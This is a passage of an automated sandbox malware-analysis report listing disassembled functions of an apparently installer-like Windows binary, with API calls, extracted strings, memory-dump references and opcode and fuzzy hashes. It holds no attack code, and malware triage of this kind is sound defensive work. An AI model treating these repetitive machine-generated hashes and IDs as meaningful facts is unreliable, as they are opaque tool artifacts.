                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Interlocked$DecrementIncrementlstrlen
                                                                                  • String ID: .ts1$ftp://
                                                                                  • API String ID: 1122469558-3531992581
                                                                                  • Opcode ID: fba88ae3a661b86b74691d9fc3ed96ed6bd6988d470393f6b60523c6fe6fa2b1
                                                                                  • Instruction ID: b23469b802c3d87ff035e30288ec3f7e072d4780da6447de21843100e3b89ac1
                                                                                  • Opcode Fuzzy Hash: fba88ae3a661b86b74691d9fc3ed96ed6bd6988d470393f6b60523c6fe6fa2b1
                                                                                  • Instruction Fuzzy Hash: 14718075801248EADF10EFA1C845FEFBBB8AF14304F10455EF905A3282DB786B48CB65
                                                                                  Function 004B0D42 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 004B0DD2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorHandling__start
                                                                                  • String ID: pow
                                                                                  • API String ID: 3213639722-2276729525
                                                                                  • Opcode ID: 4f3e8c9c395e317641432ed13ff21fdc8adef406b50af257f578cc695e7d7fa7
                                                                                  • Instruction ID: e10c71b509a5909ce378f67f3f79b64f482ca2e33bf24b72674e2bf55db5efc5
                                                                                  • Opcode Fuzzy Hash: 4f3e8c9c395e317641432ed13ff21fdc8adef406b50af257f578cc695e7d7fa7
                                                                                  • Instruction Fuzzy Hash: D4515E6190C20196CB21B758C9513FB3B95DB14712F208D6BE491823E9DB3CDCA9D67F
                                                                                  Function 00434125 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0043412A
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$lstrlen
                                                                                  • String ID: 0:R$I
                                                                                  • API String ID: 3243491680-1600366541
                                                                                  • Opcode ID: 111e8c79b85105b137a4c019ed7d09d61113b06c70afe54a9a15e350266782eb
                                                                                  • Instruction ID: df62d6789979d9f3daf6c84f98353f7b6eaf649a8d07728426456e3b4f0ee987
                                                                                  • Opcode Fuzzy Hash: 111e8c79b85105b137a4c019ed7d09d61113b06c70afe54a9a15e350266782eb
                                                                                  • Instruction Fuzzy Hash: 8851F339800619AADB05F7A6CC06FEF77689F16368F10424FF511761C2DB7C678582AE
                                                                                  Function 00478D21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 143COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00478D26
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 004788B3: __EH_prolog.LIBCMT ref: 004788B8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$IncrementInterlocked
                                                                                  • String ID: %AppDrive%$%AppFolder%
                                                                                  • API String ID: 2670639370-1066381584
                                                                                  • Opcode ID: b95bd42a4d9d9520b7178d9f7a485212d443a9443fe58cca4768a6e507b87818
                                                                                  • Instruction ID: d953ef7572ca27abfb639f3938d09caa18a5fba9010cafaf00cae2917d6b978e
                                                                                  • Opcode Fuzzy Hash: b95bd42a4d9d9520b7178d9f7a485212d443a9443fe58cca4768a6e507b87818
                                                                                  • Instruction Fuzzy Hash: 9451D475900649AFCB14EFA5C855FEE77A8AF10308F00855EF41A932C1DFB8AB48C765
                                                                                  Function 0040C17F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040C184
                                                                                    • Part of subcall function 00408EFE: __EH_prolog.LIBCMT ref: 00408F03
                                                                                    • Part of subcall function 00408EFE: GetFileAttributesA.KERNEL32(?), ref: 00408F28
                                                                                    • Part of subcall function 004C5707: CreateFileA.KERNEL32(00000000,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,00000000), ref: 004C57E2
                                                                                    • Part of subcall function 004C5707: GetLastError.KERNEL32 ref: 004C57F4
                                                                                  • lstrcpy.KERNEL32(?,?), ref: 0040C2A5
                                                                                    • Part of subcall function 0040C343: IsWindow.USER32(?), ref: 0040C355
                                                                                    • Part of subcall function 0040C343: __ftol.LIBCMT ref: 0040C383
                                                                                    • Part of subcall function 0040C343: SendMessageA.USER32(?,00000402,00000000,00000000), ref: 0040C394
                                                                                    • Part of subcall function 0040C39D: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0040C412
                                                                                    • Part of subcall function 0040C39D: TranslateMessage.USER32(?), ref: 0040C442
                                                                                    • Part of subcall function 0040C39D: DispatchMessageA.USER32(?), ref: 0040C44C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$FileH_prolog$AttributesCreateDispatchErrorLastPeekSendTranslateWindow__ftollstrcpy
                                                                                  • String ID: ThN
                                                                                  • API String ID: 510894268-2830422598
                                                                                  • Opcode ID: d458fbfd1f394d872ddb4b4665e054130897df9b3601ade3c75f7a8e790c81aa
                                                                                  • Instruction ID: 25bdd14736904e7a68876107adc4856bed8a9e72e083bc47d31e4424eccc7f6d
                                                                                  • Opcode Fuzzy Hash: d458fbfd1f394d872ddb4b4665e054130897df9b3601ade3c75f7a8e790c81aa
                                                                                  • Instruction Fuzzy Hash: 88518F35C00249EADF04EFE5D885BEEBB74AF14318F10816EE41172292DB786B49CB29
                                                                                  Function 00410C62 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00410C67
                                                                                    • Part of subcall function 004C60D9: __EH_prolog.LIBCMT ref: 004C60DE
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                    • Part of subcall function 004B0B55: GetFileAttributesA.KERNEL32(-R,004BD3B6,?,00000000,00000000,00522DE4,?,?,?,004EF72C,00000000), ref: 004B0B59
                                                                                    • Part of subcall function 004B0B55: GetLastError.KERNEL32(?,?,?,004EF72C,00000000), ref: 004B0B64
                                                                                    • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prologInterlocked$AttributesDecrementErrorFileIncrementLast
                                                                                  • String ID: .bak$.bak%d
                                                                                  • API String ID: 677611752-745829535
                                                                                  • Opcode ID: 7e6af0bc713ebb1c8bff64c2036c7c75824edcac6276b8b3d621ce1689b3e185
                                                                                  • Instruction ID: 8dc6751980f71ab65e1ded59b00581142b9bb52d9439ec5f0642a256a849fc29
                                                                                  • Opcode Fuzzy Hash: 7e6af0bc713ebb1c8bff64c2036c7c75824edcac6276b8b3d621ce1689b3e185
                                                                                  • Instruction Fuzzy Hash: 83417F7A800659EACB01EBE5C845FEFBB78AF14318F10415EF511A3181DB786748CB75
                                                                                  Function 00430B4E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00430B53
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                  • GetProcAddress.KERNEL32(00000000,MsiGetPatchInfoA), ref: 00430BC5
                                                                                    • Part of subcall function 004AF0B8: RtlFreeHeap.NTDLL(00000000,?,00000000,00000010,?,?,004AF278,00000009,?), ref: 004AF18C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$AddressFreeHeapLibraryLoadProclstrlen
                                                                                  • String ID: MsiGetPatchInfoA
                                                                                  • API String ID: 2260080404-1707134638
                                                                                  • Opcode ID: 8a7626d70408cf29df8550467f0c79caeecfdd22aae776b9c0116046193ab3b6
                                                                                  • Instruction ID: f622c02d9beb288d9a41b1fd29b04a252ada4eada294bb5e6b80a74a96ebaf97
                                                                                  • Opcode Fuzzy Hash: 8a7626d70408cf29df8550467f0c79caeecfdd22aae776b9c0116046193ab3b6
                                                                                  • Instruction Fuzzy Hash: 1741C136C00159AACF19FBA2DC56EEF7B35AF15304F24412FF502B2192DB3C5A85C6A9
                                                                                  Function 00478FC2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: SessionVar$TU2SessionVars
                                                                                  • API String ID: 3519838083-2975459907
                                                                                  • Opcode ID: c3937737354a64f91d29a85025fe825a42d20b69f80d334f657c088350fccd8d
                                                                                  • Instruction ID: 6432e3fcee6e6828c1ecf386406162fe5d28e1e48fdcdae3da0d832cd8abba94
                                                                                  • Opcode Fuzzy Hash: c3937737354a64f91d29a85025fe825a42d20b69f80d334f657c088350fccd8d
                                                                                  • Instruction Fuzzy Hash: 1641D231A10258ABCB24EB61C855BEEB7A9EF01754F04C12FF80A97281DF789E45C799
                                                                                  Function 00474120 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00474125
                                                                                    • Part of subcall function 004CF94C: __EH_prolog.LIBCMT ref: 004CF951
                                                                                    • Part of subcall function 004CF94C: SetRectEmpty.USER32(?), ref: 004CF9D5
                                                                                    • Part of subcall function 0041519E: __EH_prolog.LIBCMT ref: 004151A3
                                                                                    • Part of subcall function 004744FF: __EH_prolog.LIBCMT ref: 00474504
                                                                                    • Part of subcall function 004744FF: GetFileAttributesA.KERNEL32(?,?,?,?,?,004741D2), ref: 004745D5
                                                                                    • Part of subcall function 004744FF: ExtractIconA.SHELL32(?,?,00000000), ref: 004745ED
                                                                                    • Part of subcall function 004744FF: LoadIconA.USER32(?,00000073), ref: 0047460D
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 004741EC
                                                                                    • Part of subcall function 004C764B: wsprintfA.USER32 ref: 004C7681
                                                                                    • Part of subcall function 004C764B: GetClassInfoA.USER32(?,-00000058,?), ref: 004C76AC
                                                                                    • Part of subcall function 004D015D: LoadMenuA.USER32(?,?), ref: 004D017A
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0047FCF1: __EH_prolog.LIBCMT ref: 0047FCF6
                                                                                    • Part of subcall function 004C9476: SetWindowTextA.USER32(00000000,00000001), ref: 004C9484
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Load$IconInterlocked$AttributesClassCursorDecrementEmptyExtractFileIncrementInfoMenuRectTextWindowwsprintf
                                                                                  • String ID: Setup Application
                                                                                  • API String ID: 290103600-2584944704
                                                                                  • Opcode ID: c25369e096fe7d3be7f0efebf4cba972cf1625081253853676dfbc90916f3fb1
                                                                                  • Instruction ID: cc1ae726476ff2df5a67b642d2c53a851a4056213f42686761d8d7ec8fde6f92
                                                                                  • Opcode Fuzzy Hash: c25369e096fe7d3be7f0efebf4cba972cf1625081253853676dfbc90916f3fb1
                                                                                  • Instruction Fuzzy Hash: C1418D74900644EECB01EFAAC945BEEBBF4EF55308F00805FE406A7382DB782A05CB65
                                                                                  Function 004801EB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004801F0
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: DecrementH_prologInterlocked
                                                                                  • String ID: format$hex
                                                                                  • API String ID: 3164693477-1485289233
                                                                                  • Opcode ID: e78bfa4c3b28e76ec602a13045f26fb30a7ad3081961aaa0353f1c72c5e02176
                                                                                  • Instruction ID: 63ac802d9f089038e9c95cc77e0c68553d63bc3e3eef8d01ecc9caa67044fc9e
                                                                                  • Opcode Fuzzy Hash: e78bfa4c3b28e76ec602a13045f26fb30a7ad3081961aaa0353f1c72c5e02176
                                                                                  • Instruction Fuzzy Hash: 08312731500249AFCF04EF66C852EEE7BB5EF84308F10846FF815A7292CB789A49D765
                                                                                  Function 0046C87F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0046C884
                                                                                    • Part of subcall function 00468117: __EH_prolog.LIBCMT ref: 0046811C
                                                                                  Strings
                                                                                  • IDS_CTRL_HEADINGTEXT_BODY, xrefs: 0046C967
                                                                                  • IDS_CTRL_STATICTEXT_BODY, xrefs: 0046C8D4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: IDS_CTRL_HEADINGTEXT_BODY$IDS_CTRL_STATICTEXT_BODY
                                                                                  • API String ID: 3519838083-3606236380
                                                                                  • Opcode ID: d983231e5e4ded4787ff96606f8914af4e0dba78532c44342271eea23bca7ad4
                                                                                  • Instruction ID: 8154a464002968108653f5dcc75fb85f388f8944d62b225d8e1d3f33522248a0
                                                                                  • Opcode Fuzzy Hash: d983231e5e4ded4787ff96606f8914af4e0dba78532c44342271eea23bca7ad4
                                                                                  • Instruction Fuzzy Hash: 0441A170900B159FCB14EFA6C946AAFFBF4EF44324F10461FE052A3281DBB86A44CB95
                                                                                  Function 00480C3F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00480C44
                                                                                  • GetFileAttributesA.KERNEL32(?,?,00000003,?), ref: 00480C7F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFileH_prolog
                                                                                  • String ID: *.*
                                                                                  • API String ID: 3244726999-438819550
                                                                                  • Opcode ID: 34c16f21f02b29f5104a110ce262f75d7bf4e430f8ec3c5c1606165d39ac36eb
                                                                                  • Instruction ID: ff9bae1c1743d6176b14c7a7234a5379115556f5cead71cf5695c9e32197466e
                                                                                  • Opcode Fuzzy Hash: 34c16f21f02b29f5104a110ce262f75d7bf4e430f8ec3c5c1606165d39ac36eb
                                                                                  • Instruction Fuzzy Hash: 87310A75A10204DBCB54FFA9C581BEEBBB4AF05304F10466FF405A7281D778AE89C795
                                                                                  Function 00480321 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
